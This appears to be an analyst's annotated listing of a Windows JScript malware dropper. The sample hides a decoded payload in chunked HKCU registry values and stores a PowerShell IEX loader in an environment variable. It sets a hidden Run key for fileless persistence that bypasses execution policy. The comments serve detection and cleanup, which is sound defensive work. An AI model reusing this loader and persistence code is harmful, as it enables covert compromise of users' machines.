@malwarezone
Last active December 2, 2020 16:27
// Annotated JScript (Windows Script Host) dropper, as published by the analyst.
// The <# ... #> blocks are analyst annotations in PowerShell comment syntax, not
// valid JScript, and the payload string below is truncated ("[...]"), so this
// listing is for reading, not execution. Every artifact the script writes is
// named after a value derived from the host's MachineGuid (my_key, below); that
// name is also the handle a responder needs to find and remove the artifacts.
<#
Obfuscated payload (the next stage, containing the PE):
#>
var obf_data1 = 'B323232323230237D202075656C635D2[...]';
<#
Initialize the COM objects used for the file-system check and for launching PowerShell:
#>
shell_app = WScript.CreateObject("shell.application");
fs_obj = new ActiveXObject("Scripting.FileSystemObject");
<#
Decode the obfuscated content: reverse the string, then read it as hex byte pairs.
#>
var stage2 = obf_data1.split("").reverse().join("");
stage3 = '';
// Each two-character slice is coerced to a number via the '0x' prefix, so
// stage3 is the reversed hex string decoded into characters.
// NOTE(review): the analyst's annotation says this holds a PE; from the visible
// code alone, stage3 is only what the PowerShell stage later passes to IEX, so
// it is at least PowerShell-parseable text.
for (i = 0; i < (stage2.length / 2); i++) {
stage3 += String.fromCharCode('0x' + stage2.substr(i * 2, 2));
}
var shell_obj = WScript.CreateObject("WScript.Shell");
<#
Create the name of the key based on the MachineGuid:
#>
// Read from HKLM (typically readable without elevation).
machine_guid = shell_obj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid");
var pattern = /\-|[0-9]/g;
// Strip hyphens and digits, leaving only the GUID's hex letters, prefixed with
// "A" and lowercased. The result is a short, letters-only name unique to this
// host; the same name is reused for the storage key, the environment variable
// and the Run value below.
machine_guid = "A" + machine_guid.replace(pattern, "");
my_key = machine_guid.toLowerCase();
is_fresh = 0;
<#
Check whether the key already exists:
#>
// RegRead throws when the key is absent; the catch branch both marks the host
// as not-yet-infected and creates the key. If the key already exists, is_fresh
// stays 0 and everything below is skipped, so the marker key doubles as a
// once-per-machine guard.
try {
shell_obj.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\");
} catch (err) {
is_fresh = 1;
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\", "", "REG_SZ");
}
if (is_fresh == 1) {
<#
Divide the decoded content into chunks and store them as registry values:
#>
// Values are named 0, 1, 2, ... under HKCU\SOFTWARE\<my_key>, each holding
// 4000 characters as REG_SZ. A user-hive key with many numerically named
// REG_SZ values of this size is the primary registry artifact of this sample;
// registry value-set telemetry on HKCU\SOFTWARE\<letters-only name> catches it.
chunk = '';
counter = 0;
for (var i = 0; i <= stage3.length - 1; i++) {
chunk = chunk + stage3.substring(i, i + 1);
if (chunk.length == 4000) {
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
counter = counter + 1;
chunk = '';
}
}
<#
Write the last (partial) chunk:
#>
// counter is incremented before this write, so the value that would have been
// named `counter` is skipped and the remainder lands one index higher. The
// reader below iterates 0..500 and presumably treats a missing value as empty,
// so the gap does not break the loader, but it is a recognisable fingerprint.
if (chunk.length > 0) {
counter = counter + 1;
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
}
<#
Pick the PowerShell path:
#>
// The presence of "Program Files (x86)" is used as a 64-bit-OS test, in which
// case the 32-bit (SysWOW64) PowerShell is chosen.
if (fs_obj.FolderExists("C:\\Program Files (x86)")) {
var powershell_path = 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe';
} else {
var powershell_path = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
}
<#
Store the command that reads the saved values one by one:
#>
// ps_cmd1 is a PowerShell one-liner: read properties 0..500 of
// HKCU:\SOFTWARE\<my_key>, concatenate them, and IEX the result. It is saved
// as a per-user environment variable (HKCU\Environment\<my_key>), so the loader
// text lives in the registry rather than on any command line. An Environment
// value containing "IEX(" is itself a strong indicator.
ps_cmd1 = 'for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path \'HKCU:\\SOFTWARE\\' + my_key + '\').$i}Catch{}}IEX($abc)';
shell_obj.RegWrite("HKEY_CURRENT_USER\\Environment\\" + my_key, ps_cmd1, "REG_EXPAND_SZ");
// ps_cmd2 is what appears on the command line: a hidden PowerShell whose only
// visible payload is IEX of that environment variable. Command-line logging
// shows "-ExecutionPolicy Bypass -windowstyle hidden" plus the letters-only
// variable name, not the loader itself.
ps_cmd2 = '-ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable(\'' + my_key + '\', \'User\'))"';
<#
Add the Run key for (fileless) persistence:
#>
// HKCU Run value named <my_key>. Nothing is dropped to disk, so cleanup means
// removing this Run value, the HKCU\Environment\<my_key> value and the
// HKCU\SOFTWARE\<my_key> key (the last of which is also the reinfection marker).
shell_obj.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + my_key, powershell_path + ' ' + ps_cmd2, "REG_SZ");
<#
Run the same PowerShell command immediately (as the Run key will at next logon):
#>
// Window style 0 = hidden. Process-creation telemetry will show the WSH host
// (wscript.exe or cscript.exe) spawning powershell.exe with the ps_cmd2
// arguments, which is the most reliable runtime detection point for this stage.
shell_app.ShellExecute(powershell_path, ps_cmd2, "", "open", 0);
}